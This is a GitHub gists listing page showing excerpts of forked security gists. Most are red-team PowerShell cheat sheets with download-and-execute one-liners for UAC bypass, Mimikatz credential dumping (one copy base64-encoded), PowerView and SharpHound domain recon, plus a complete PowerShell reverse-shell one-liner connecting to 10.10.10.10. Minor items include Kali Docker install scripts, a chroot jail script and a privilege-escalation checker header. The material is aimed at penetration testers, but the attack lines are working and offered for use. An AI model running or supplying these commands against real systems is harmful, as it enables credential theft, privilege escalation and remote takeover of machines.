Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
royharoush
royharoush
/ RedTeam_CheatSheet.ps1
Created
October 24, 2021 12:42
— forked from jivoi/RedTeam_CheatSheet.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
royharoush
/ web-servers.md
Created
October 8, 2021 20:28
— forked from willurd/web-servers.md
Big list of http static server one-liners
royharoush
/ Quick-Mimikatz
Created
June 24, 2020 23:14
— forked from gfoss/Quick-Mimikatz
Quick Mimikatz
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
| #mimikatz [local] | |
| IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; | |
| #encoded-mimikatz [local] | |
| powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQ |
royharoush
/ RedTeam_CheatSheet.ps1
Last active
June 5, 2020 12:09
— forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); |
royharoush
/ create_chrootjail.sh
Created
January 15, 2020 15:16
— forked from schnell18/create_chrootjail.sh
Script to automate the creation of chroot jail w/ minimal executables to run git.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # script to automate the creation of chroot jail | |
| # w/ minimal executables to run git | |
| export CHROOT=/var/chroot | |
| function copy_binary() { | |
| for i in $(ldd $*|grep -v dynamic|cut -d " " -f 3|sed 's/://'|sort|uniq) | |
| do | |
| cp --parents $i $CHROOT |
royharoush
/ powershell_reverse_shell.ps1
Created
February 10, 2019 12:41
— forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
royharoush
/ Kali 2017.1 x64, Docker-ce Install script
Last active
June 17, 2018 15:40
— forked from nikallass/Kali 2017.1 x64, Docker-ce Install script
Kali 2017.1 x64, Docker-ce Install script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # update apt-get | |
| export DEBIAN_FRONTEND="noninteractive" | |
| sudo apt-get update | |
| # remove previously installed Docker | |
| sudo apt-get remove docker docker-engine docker.io* lxc-docker* -y | |
| # install dependencies 4 cert |
royharoush
/ Kali 2016.1, Docker Install script
Created
August 14, 2017 13:05
— forked from apolloclark/Kali 2016.1, Docker Install script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # update apt-get | |
| export DEBIAN_FRONTEND="noninteractive" | |
| sudo apt-get update | |
| # remove previously installed Docker | |
| sudo apt-get purge lxc-docker* | |
| sudo apt-get purge docker.io* |
royharoush
/ linuxprivchecker.py
Created
August 29, 2016 08:50
— forked from sh1n0b1/linuxprivchecker.py
linuxprivchecker.py -- a Linux Privilege Escalation Check Script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/env python | |
| ############################################################################################################### | |
| ## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script | |
| ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift | |
| ##------------------------------------------------------------------------------------------------------------- | |
| ## [Details]: | |
| ## This script is intended to be executed locally on a Linux box to enumerate basic system info and | |
| ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text | |
| ## passwords and applicable exploits. |